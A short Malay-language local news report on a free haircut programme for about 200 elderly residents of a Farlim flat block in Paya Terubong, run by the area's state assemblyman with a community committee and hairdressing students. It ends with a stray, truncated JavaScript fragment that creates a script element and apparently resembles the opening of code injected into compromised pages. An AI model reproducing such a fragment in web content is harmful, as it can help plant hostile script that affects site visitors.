Gunting rambut percuma untuk golongan warga emas

PAYA TERUBONG – Kira-kira 200 warga emas mengambil bahagian dalam penganjuran program gunting rambut percuma anjuran Ahli Dewan Undangan Negeri (ADUN) Paya Terubong, Yeoh Soon Hin di sini baru-baru ini.

Soon Hin berkata, warga-warga emas terbabit adalah merupakan penghuni Blok 2G, Jalan Angsana, Farlim di sini.

“Program ini julung kali diadakan secara bersama dengan Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) Semarak Api.

“Saya bersyukur kerana dapat ‘membantu’ golongan warga emas ini, sebagai tambahan, ia juga dapat mempromosikan budaya kemasyarakatan antara dua generasi berbeza iaitu warga emas dan muda-mudi yang merupakan pelajar di Akademi Hair Story International Sdn. Bhd. yang terlibat secara langsung dalam pelaksanaan program ini,’’ katanya pada program Gunting Rambut Percuma di sini baru-baru ini.

Mengulas lanjut, Soon Hin tidak menolak kemungkinan bahawa beliau akan menganjurkan program sama pada masa hadapan bagi meringankan beban warga emas di kawasan berkaitan.

var d=document;var s=d.createElement(‘script’);